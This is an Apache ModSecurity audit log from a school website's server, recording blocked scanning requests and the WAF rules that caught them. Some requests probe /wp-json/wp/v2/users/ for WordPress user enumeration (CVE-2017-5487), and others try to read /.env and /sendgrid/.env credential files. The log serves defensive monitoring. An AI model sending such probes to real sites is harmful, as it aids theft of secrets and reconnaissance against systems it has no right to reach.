Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747023738692925 3008 (- - -) Stopwatch2: 1747023738692925 3008; combined=1255, p1=426, p2=797, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f7eb3c-Z-- --c8ec3c34-A-- [12/May/2025:11:50:30 +0700] aCF-FhLjIumP119c9poKQwAAAAM 103.236.140.4 54056 103.236.140.4 8181 --c8ec3c34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 129.0.65.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 129.0.65.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c8ec3c34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8ec3c34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747025430709874 3456 (- - -) Stopwatch2: 1747025430709874 3456; combined=1460, p1=479, p2=949, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8ec3c34-Z-- --9c6de671-A-- [12/May/2025:11:56:23 +0700] aCF_d-ll0ld2l7Li0sdF0AAAAI0 103.236.140.4 54076 103.236.140.4 8181 --9c6de671-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.152.158 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.152.158 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9c6de671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c6de671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747025783153150 857 (- - -) Stopwatch2: 1747025783153150 857; combined=356, p1=317, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c6de671-Z-- --8f46531a-A-- [12/May/2025:12:02:13 +0700] aCGA1RLjIumP119c9poKSQAAAAk 103.236.140.4 54138 103.236.140.4 8181 --8f46531a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.194.18.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.194.18.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f46531a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f46531a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747026133928933 3449 (- - -) Stopwatch2: 1747026133928933 3449; combined=1471, p1=493, p2=947, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f46531a-Z-- --350e0d20-A-- [12/May/2025:12:06:00 +0700] aCGBuOll0ld2l7Li0sdF2AAAAIA 103.236.140.4 54164 103.236.140.4 8181 --350e0d20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.220.112.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.220.112.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --350e0d20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --350e0d20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747026360476728 2490 (- - -) Stopwatch2: 1747026360476728 2490; combined=1193, p1=380, p2=784, p3=0, p4=0, p5=28, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --350e0d20-Z-- --b7861b09-A-- [12/May/2025:12:13:58 +0700] aCGDlhKpX3ymKhxxBshGzAAAAEU 103.236.140.4 54192 103.236.140.4 8181 --b7861b09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Accept-Charset: utf-8 --b7861b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7861b09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747026838637037 791 (- - -) Stopwatch2: 1747026838637037 791; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7861b09-Z-- --42dfa526-A-- [12/May/2025:13:03:08 +0700] aCGPHH4i-S7TW27OkGmBFAAAAMI 103.236.140.4 54496 103.236.140.4 8181 --42dfa526-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.223.132.86 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --42dfa526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42dfa526-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747029788022339 756 (- - -) Stopwatch2: 1747029788022339 756; combined=289, p1=258, p2=0, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42dfa526-Z-- --a9dfe91e-A-- [12/May/2025:14:13:54 +0700] aCGfshKpX3ymKhxxBshPcQAAAFY 103.236.140.4 46354 103.236.140.4 8181 --a9dfe91e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.107.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.107.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9dfe91e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9dfe91e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034034826849 3306 (- - -) Stopwatch2: 1747034034826849 3306; combined=1470, p1=512, p2=900, p3=0, p4=0, p5=57, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9dfe91e-Z-- --3cb8ac70-A-- [12/May/2025:14:24:32 +0700] aCGiMOll0ld2l7Li0sdPnwAAAJY 103.236.140.4 46420 103.236.140.4 8181 --3cb8ac70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 31.220.76.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.220.76.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cb8ac70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cb8ac70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034672023862 3667 (- - -) Stopwatch2: 1747034672023862 3667; combined=1626, p1=513, p2=1075, p3=0, p4=0, p5=38, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cb8ac70-Z-- --da5e4e76-A-- [12/May/2025:14:25:04 +0700] aCGiUBLjIumP119c9poUkwAAABQ 103.236.140.4 46450 103.236.140.4 8181 --da5e4e76-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 206.81.24.227 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --da5e4e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da5e4e76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034704246036 859 (- - -) Stopwatch2: 1747034704246036 859; combined=365, p1=330, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da5e4e76-Z-- --f61cae02-A-- [12/May/2025:14:27:21 +0700] aCGi2RLjIumP119c9poUlgAAAAA 103.236.140.4 46470 103.236.140.4 8181 --f61cae02-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f61cae02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f61cae02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841416301 886 (- - -) Stopwatch2: 1747034841416301 886; combined=338, p1=295, p2=0, p3=0, p4=0, p5=42, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f61cae02-Z-- --41de6a1f-A-- [12/May/2025:14:27:21 +0700] aCGi2ell0ld2l7Li0sdPpQAAAIk 103.236.140.4 46474 103.236.140.4 8181 --41de6a1f-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --41de6a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41de6a1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841466925 720 (- - -) Stopwatch2: 1747034841466925 720; combined=261, p1=226, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41de6a1f-Z-- --893b813c-A-- [12/May/2025:14:27:21 +0700] aCGi2X4i-S7TW27OkGmLqAAAANQ 103.236.140.4 46478 103.236.140.4 8181 --893b813c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --893b813c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --893b813c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841557037 790 (- - -) Stopwatch2: 1747034841557037 790; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --893b813c-Z-- --08535f06-A-- [12/May/2025:14:28:08 +0700] aCGjCH4i-S7TW27OkGmLqQAAANU 103.236.140.4 46484 103.236.140.4 8181 --08535f06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.186.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.186.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --08535f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08535f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034888617476 3131 (- - -) Stopwatch2: 1747034888617476 3131; combined=1310, p1=444, p2=835, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08535f06-Z-- --46777217-A-- [12/May/2025:14:38:33 +0700] aCGleRLjIumP119c9poUowAAABU 103.236.140.4 46520 103.236.140.4 8181 --46777217-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.6.88.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.6.88.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46777217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46777217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747035513359563 3471 (- - -) Stopwatch2: 1747035513359563 3471; combined=1453, p1=472, p2=949, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46777217-Z-- --73b55249-A-- [12/May/2025:15:01:02 +0700] aCGqvhLjIumP119c9poZZAAAAAc 103.236.140.4 50866 103.236.140.4 8181 --73b55249-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.48.159.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.48.159.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73b55249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73b55249-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747036862093778 3135 (- - -) Stopwatch2: 1747036862093778 3135; combined=1397, p1=504, p2=856, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73b55249-Z-- --70458c55-A-- [12/May/2025:15:23:02 +0700] aCGv5hLjIumP119c9pojwwAAAAw 103.236.140.4 60856 103.236.140.4 8181 --70458c55-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --70458c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70458c55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747038182518472 910 (- - -) Stopwatch2: 1747038182518472 910; combined=387, p1=351, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70458c55-Z-- --6bbd4b78-A-- [12/May/2025:15:52:08 +0700] aCG2uBKpX3ymKhxxBshTJAAAAEQ 103.236.140.4 35292 103.236.140.4 8181 --6bbd4b78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.155.239.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.155.239.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6bbd4b78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bbd4b78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747039928412522 2912 (- - -) Stopwatch2: 1747039928412522 2912; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bbd4b78-Z-- --e31cf36b-A-- [12/May/2025:15:59:32 +0700] aCG4dBLjIumP119c9pomigAAAAg 103.236.140.4 35376 103.236.140.4 8181 --e31cf36b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.72.97.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.72.97.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e31cf36b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e31cf36b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 